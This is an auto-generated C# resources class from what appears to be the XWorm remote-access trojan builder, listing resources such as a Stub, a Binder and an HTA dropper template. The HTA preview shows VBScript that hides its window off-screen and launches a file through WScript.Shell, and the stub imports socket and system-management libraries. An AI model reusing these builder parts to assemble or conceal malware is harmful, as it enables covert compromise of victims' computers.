//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

using System;



/// <summary>
///   A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class XWorm_Resources {
    
    private static global::System.Resources.ResourceManager resourceMan;
    
    private static global::System.Globalization.CultureInfo resourceCulture;
    
    [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
    internal XWorm_Resources() {
    }
    
    /// <summary>
    ///   Returns the cached ResourceManager instance used by this class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Resources.ResourceManager ResourceManager {
        get {
            if (object.ReferenceEquals(resourceMan, null)) {
                global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("XWorm.Resources", typeof(XWorm_Resources).Assembly);
                resourceMan = temp;
            }
            return resourceMan;
        }
    }
    
    /// <summary>
    ///   Overrides the current thread's CurrentUICulture property for all
    ///   resource lookups using this strongly typed resource class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Globalization.CultureInfo Culture {
        get {
            return resourceCulture;
        }
        set {
            resourceCulture = value;
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Byte[].
    /// </summary>
    internal static byte[] _7z {
        get {
            object obj = ResourceManager.GetObject("_7z", resourceCulture);
            return ((byte[])(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Byte[].
    /// </summary>
    internal static byte[] _7zD {
        get {
            object obj = ResourceManager.GetObject("_7zD", resourceCulture);
            return ((byte[])(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap _Error {
        get {
            object obj = ResourceManager.GetObject("_Error", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap _Stop {
        get {
            object obj = ResourceManager.GetObject("_Stop", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized string similar to Imports System
    ///Imports System.IO
    ///Imports System.Collections
    ///Imports System.Collections.Generic
    ///Imports System.Threading
    ///Imports System.Diagnostics
    ///Imports System.Runtime.CompilerServices
    ///Imports Microsoft.VisualBasic
    ///Imports Microsoft.VisualBasic.CompilerServices
    ///Imports System.Environment
    ///Imports System.Reflection
    ///Imports System.Resources
    ///Imports System.Security.Cryptography
    ///Imports System.Runtime.InteropServices
    ///
    ///&lt;Assembly: AssemblyTitle(&quot;%Title%&quot;)&gt;
    ///&lt;Assembly: AssemblyDescription(&quot;%Des%&quot;)&gt; [rest of string was truncated]&quot;;.
    /// </summary>
    internal static string Binder {
        get {
            return ResourceManager.GetString("Binder", resourceCulture);
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap CD {
        get {
            object obj = ResourceManager.GetObject("CD", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Byte[].
    /// </summary>
    internal static byte[] Chat {
        get {
            object obj = ResourceManager.GetObject("Chat", resourceCulture);
            return ((byte[])(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized string similar to @echo off
    ///title XWorm - Fixer
    ///echo If XWorm Does Not work - Run This Script As Administrator!
    ///
    ///pause
    ///lodctr /r
    ///pause.
    /// </summary>
    internal static string Fixer {
        get {
            return ResourceManager.GetString("Fixer", resourceCulture);
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Folder {
        get {
            object obj = ResourceManager.GetObject("Folder", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap HDD {
        get {
            object obj = ResourceManager.GetObject("HDD", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized string similar to &lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
    ///&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
    ///  &lt;head&gt;
    ///    &lt;meta content=&quot;text/html; charset=utf-8&quot; http-equiv=&quot;Content-Type&quot; /&gt;
    ///    &lt;script language=&quot;VBScript&quot;&gt;
    ///Window.ReSizeTo 0, 0
    ///Window.MoveTo -4000, -4000
    ///set oShell = CreateObject(&quot;WScript.Shell&quot;)
    ///Dim Str
    ///Str = &quot;%Path%&quot; &amp; &quot;\%Filename%&quot;
    ///const DontWaitUntilFinished = false, ShowWindow = 1, DontShowWindow = 0, WaitUntilFinished [rest of string was truncated]&quot;;.
    /// </summary>
    internal static string HTA {
        get {
            return ResourceManager.GetString("HTA", resourceCulture);
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Information {
        get {
            object obj = ResourceManager.GetObject("Information", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Byte[].
    /// </summary>
    internal static byte[] Intro {
        get {
            object obj = ResourceManager.GetObject("Intro", resourceCulture);
            return ((byte[])(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Network {
        get {
            object obj = ResourceManager.GetObject("Network", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Play {
        get {
            object obj = ResourceManager.GetObject("Play", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Question {
        get {
            object obj = ResourceManager.GetObject("Question", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized string similar to Imports System
    ///Imports System.Security.Cryptography
    ///Imports System.Text
    ///Imports System.Diagnostics
    ///Imports System.IO
    ///Imports System.Management
    ///Imports System.Net.Sockets
    ///Imports System.Runtime.CompilerServices
    ///Imports System.Security.Principal
    ///Imports System.Threading
    ///Imports Microsoft.VisualBasic.CompilerServices
    ///Imports Microsoft.VisualBasic.Devices
    ///Imports System.Windows.Forms
    ///Imports System.Net
    ///Imports System.Runtime.InteropServices
    ///Imports System.Collections.Generic
    ///Imports System.Drawi [rest of string was truncated]&quot;;.
    /// </summary>
    internal static string Stub {
        get {
            return ResourceManager.GetString("Stub", resourceCulture);
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap USB {
        get {
            object obj = ResourceManager.GetObject("USB", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
    
    /// <summary>
    ///   Looks up a localized string similar to Imports System.Windows.Forms
    ///Imports System
    ///Imports System.Data
    ///Imports System.Drawing
    ///Imports System.Deployment
    ///Imports System.Xml
    ///Imports Microsoft.VisualBasic
    ///Imports System.Threading
    ///
    ///Public Class Program
    ///    Public Shared Sub Main(ByVal args As String())
    ///        Try
    ///            MessageBox.Show(&quot;Hello World!&quot;)
    ///        Catch
    ///        End Try
    ///    End Sub
    ///End Class.
    /// </summary>
    internal static string VBCode {
        get {
            return ResourceManager.GetString("VBCode", resourceCulture);
        }
    }
    
    /// <summary>
    ///   Looks up a localized resource of type System.Drawing.Bitmap.
    /// </summary>
    internal static System.Drawing.Bitmap Warning {
        get {
            object obj = ResourceManager.GetObject("Warning", resourceCulture);
            return ((System.Drawing.Bitmap)(obj));
        }
    }
}
